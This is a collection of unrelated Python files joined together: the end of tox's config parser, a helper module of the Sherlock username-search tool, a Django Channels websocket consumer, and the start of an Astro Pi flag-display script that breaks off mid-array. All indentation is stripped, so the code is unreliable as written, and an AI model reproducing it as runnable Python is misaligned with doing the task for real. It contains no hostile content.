for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
config.requires = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or Version(tox.__version__).public)
deps = self.ensure_requires_satisfied(config, config.requires, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name,
"{}{}".format(testenvprefix, name),
reader._subs,
config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name,
"{}{}".format(testenvprefix, name),
reader._subs,
config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
"argv_install_command",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name,
env_attr.default,
replace=replace,
no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs[env_attr.name] = res = e
# On Python 2, exceptions are handled in __getattr__
if not six.PY2 or not isinstance(res, Exception):
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
provision_tox_env = config.provision_tox_env
if config.provision_tox_env in env_list:
msg = "provision_tox_env {} cannot be part of envlist".format(provision_tox_env)
raise tox.exception.ConfigError(msg)
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,-]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(
self,
section_name,
cfgparser,
fallbacksections=None,
factors=(),
prefix=None,
posargs="",
):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
self.posargs = posargs
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
env_values = {}
for line in value.split(sep):
if line.strip():
if line.startswith("#"): # comment lines are ignored
pass
elif line.startswith("file|"): # file markers contain paths to env files
file_path = line[5:].strip()
if os.path.exists(file_path):
with open(file_path, "rt") as file_handler:
content = file_handler.read()
env_values.update(self._getdict(content, "", sep, replace))
else:
name, value = line.split("=", 1)
env_values[name.strip()] = value.strip()
return env_values
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace, name=name)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getargv_install_command(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
if not s:
# This occurs when factors are used, and a testenv doesnt have
# a factorised value for install_command, most commonly occurring
# if setting platform is also used.
# An empty value causes error install_command must contain '{packages}'.
s = default
if "{packages}" in s:
s = s.replace("{packages}", r"\{packages\}")
if "{opts}" in s:
s = s.replace("{opts}", r"\{opts\}")
return _ArgvlistReader.getargvlist(self, s, replace=replace, name=name)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def getposargs(self, default=None):
if self.posargs:
posargs = self.posargs
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
return posargs_string
else:
return default or ""
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
assert name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>([^{}]|\\{|\\})*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
@staticmethod
def _unescape(s):
return s.replace("\\{", "{").replace("\\}", "}")
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
full_match = match.group(0)
# ":" is swallowed by the regex, so the raw matched string is checked
if full_match.startswith("{:"):
if full_match != "{:}":
raise tox.exception.ConfigError(
"Malformed substitution with prefix ':': {}".format(full_match),
)
return os.pathsep
default_value = g["default_value"]
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
if sub_value == "posargs":
return self.reader.getposargs(default_value)
sub_type = g["sub_type"]
if sub_type == "posargs":
if default_value:
value = "{}:{}".format(sub_value, default_value)
else:
value = sub_value
return self.reader.getposargs(value)
if not sub_type and not sub_value:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided. "
"If you were using `{}` for `os.pathsep`, please use `{:}`.",
)
if not sub_type and not default_value and sub_value == "/":
return os.sep
if sub_type == "env":
return self._replace_env(sub_value, default_value)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type == "posargs":
return self.reader.getposargs(sub_value)
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(sub_value)
def _replace_env(self, key, default):
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise tox.exception.SubstitutionStackError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x,
name=item,
section_name=section,
crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, sub_key):
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True, name=None):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True, name=name)
commands.extend(cls.getargvlist(reader, replaced, name=name))
else:
commands.append(cls.processcommand(reader, current_command, replace, name=name))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name,
"commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True, name=None):
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "[]":
newcommand += reader.getposargs()
continue
new_arg = ""
new_word = reader._replace(word, name=name)
new_word = reader._replace(new_word, name=name)
new_word = Replacer._unescape(new_word)
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
watson.py
|
#! /usr/bin/env python3
"""
Sherlock: Find Usernames Across Social Networks Module
This module contains helper methods for Sherlock.
"""
# ==================== Imports ==================== #
import requests
import itertools
import threading
import time
import sys
from colorama import Fore, Style
from requests_futures.sessions import FuturesSession
# ==================== Main ==================== #
class ElapsedFuturesSession(FuturesSession):
"""
Extends FutureSession to add a response time metric to each request.
This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background
"""
def request(self, method, url, hooks={}, *args, **kwargs):
start = time.time()
def timing(r, *args, **kwargs):
elapsed_sec = time.time() - start
r.elapsed = round(elapsed_sec * 1000)
try:
if isinstance(hooks['response'], (list, tuple)):
# needs to be first so we don't time other hooks execution
hooks['response'].insert(0, timing)
else:
hooks['response'] = [timing, hooks['response']]
except KeyError:
hooks['response'] = timing
return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs)
def open_file(fname):
return open(fname, "a")
def write_to_file(url, f):
f.write(url + "\n")
def print_error(err, errstr, var, verbose=False):
global error_buf
try:
error_buf
except NameError as e:
error_buf = ''
error_buf += Style.BRIGHT + Fore.WHITE + "[" + \
Fore.RED + "-" + \
Fore.WHITE + "]" + \
Fore.RED + f" {errstr}" + \
Fore.YELLOW + f" {err if verbose else var}" + '\n'
def dump_errors():
global error_buf
try:
print(error_buf)
except NameError as e:
pass
def format_response_time(response_time, verbose):
return " [{} ms]".format(response_time) if verbose else ""
def print_found(social_network, url, response_time, verbose=False):
print((Style.BRIGHT + Fore.WHITE + "[" +
Fore.GREEN + "+" +
Fore.WHITE + "]" +
format_response_time(response_time, verbose) +
Fore.GREEN + " {}:").format(social_network), url)
def print_not_found(social_network, response_time, verbose=False):
print((Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
format_response_time(response_time, verbose) +
Fore.GREEN + " {}:" +
Fore.YELLOW + " Not Found!").format(social_network))
def get_response(request_future, error_type, social_network, verbose=False):
try:
rsp = request_future.result()
if rsp.status_code:
return rsp, error_type, rsp.elapsed
except requests.exceptions.HTTPError as errh:
print_error(errh, "HTTP Error:", social_network, verbose)
except requests.exceptions.ConnectionError as errc:
print_error(errc, "Error Connecting:", social_network, verbose)
except requests.exceptions.Timeout as errt:
print_error(errt, "Timeout Error:", social_network, verbose)
except requests.exceptions.RequestException as err:
print_error(err, "Unknown error:", social_network, verbose)
return None, "", -1
class Loader:
def __init__(self):
self.done = False
def animate_loader(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if self.done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! \n')
def start_loader(self):
global __loaders
self.thread = threading.Thread(target=Loader.animate_loader, args=(self,))
try:
__loaders.append(self.thread)
except NameError as e:
__loaders = [self]
self.thread.start()
return self
def stop_loader(self):
self.done = True
self.thread.join()
return self
def stop_all():
global __loaders
for loader in __loaders:
loader.done = True
loader.thread.join()
|
consumers.py
|
import json
import sys
import time
from multiprocessing import Process
from channels.generic.websocket import WebsocketConsumer
sys.path.append("..")
from Work import Work
class MyConsumer(WebsocketConsumer):
def connect(self):
self.accept()
self.uid = self.scope['url_route']['kwargs']['uid']
self.work = Work(self.uid)
def receive(self , text_data=None , bytes_data=None):
text_data_json = json.loads(text_data)
message = text_data_json['message']
received_uid = text_data_json["uid"]
print(message , received_uid)
if message == 'ready' and received_uid == self.uid:
point_num = self.work.info["NXP"]
self.send(text_data=json.dumps({
'message': "point_num" ,
'data': point_num ,
'uid': self.uid
}))
elif message == 'start' and received_uid == self.uid:
main_work_process = Process(target=self.work.main_work)
main_work_process.start()
self.message_consumer()
main_work_process.join()
self.send(text_data=json.dumps({
'message': "finished" ,
'data': None ,
'uid': self.uid
}))
else:
self.send(text_data=json.dumps({
'message': "invalid message" ,
'data': None ,
'uid': self.uid
}))
def disconnect(self , code):
print(f"已断开websocket({self.uid})连接")
def message_consumer(self):
while True:
time.sleep(0.5)
if not self.work.q.empty():
data = self.work.q.get()
if data == -1:
return
self.send(text_data=json.dumps({
'message': "caculating" ,
'data': data ,
'uid': self.uid
}))
|
main.py
|
import logging
import logzero
import reverse_geocoder as rg
from logzero import logger
from sense_hat import SenseHat
import datetime
import os
from time import sleep
import threading
import ephem
import pprint
import math
import io
class Astro_Pi():
"""Class for every function used in experiment (a way to order the code)"""
def __init__(self, running_time):
"""When the class obj is created create the class variables
@param1: int
"""
R=[255,0,0]#Red
W=[255,255,255]#White
B=[0,0,255]#Blue
Y=[255,247,0]#Yellow
BL=[0,0,0]#Black
G=[0,255,0]#Green
L=[24,166,255]#Light blue
O=[255,145,0]#Orange
DG=[131,84,40]#Dark Green
GO=[153,101,21]#Gold
DB=[0,41,98]#Dark Blue
DR=[142,4,4]#Dark Red
BR=[128,0,0]#Brown
#Flags dict
self.flags={"GB":[W,B,B,R,R,B,B,W,B,W,B,R,R,B,W,B,B,B,W,R,R,W,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,B,B,W,R,R,W,B,B,B,W,B,R,R,B,W,B,W,B,B,R,R,B,B,W],"FR":[B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R,B,B,B,W,W,R,R,R],"DE":[BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,],"ES":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,Y,Y,Y,Y,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,Y,BL,BL,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"AT":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"CH":[R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,R,R,R,W,W,R,R,R,],"RO":[B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,B,B,B,Y,Y,R,R,R,],"SK":[W,W,W,W,W,W,W,W,W,R,R,R,W,W,W,W,W,R,W,R,W,W,W,W,B,W,W,W,B,B,B,B,B,R,B,R,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"PL":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"BY":[W,R,R,R,R,R,R,R,R,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,R,W,R,R,R,R,R,R,W,R,R,R,R,R,R,R,R,W,G,G,G,G,G,G,W,R,G,G,G,G,G,G,R,W,G,G,G,G,G,G,],"GR":[B,W,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,W,B,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,],"IT":[G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R,G,G,G,W,W,R,R,R],"HR":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,],"HU":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,],"UA":[B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y,Y],"TR":[R,R,R,R,R,R,R,R,R,R,W,W,R,R,R,R,R,W,R,R,R,W,R,R,R,W,R,R,W,W,W,R,R,W,R,R,R,W,R,R,R,R,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"RU":[W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,B,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R],"SA":[G,G,G,G,G,G,G,G,G,W,G,W,W,W,G,G,G,W,W,W,W,W,W,G,G,W,W,W,G,G,G,G,G,G,G,G,G,W,G,G,G,W,W,W,W,W,W,G,G,G,G,G,G,W,G,G,G,G,G,G,G,G,G,G,],"YE":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"IQ":[R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,W,W,W,W,W,W,W,W,W,G,W,W,G,G,W,W,W,W,G,W,W,W,G,W,W,W,W,W,W,W,W,W,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,BL,],"IR":[G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,G,W,W,W,W,W,W,W,W,W,W,W,R,R,W,W,W,W,W,W,R,R,W,W,W,W,W,W,W,W,W,W,W,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,R,],"TM":[G,R,G,R,G,W,G,G,G,R,Y,R,G,G,W,G,G,R,R,R,G,G,W,G,G,R,G,R,G,W,G,G,G,R,Y,R,G,G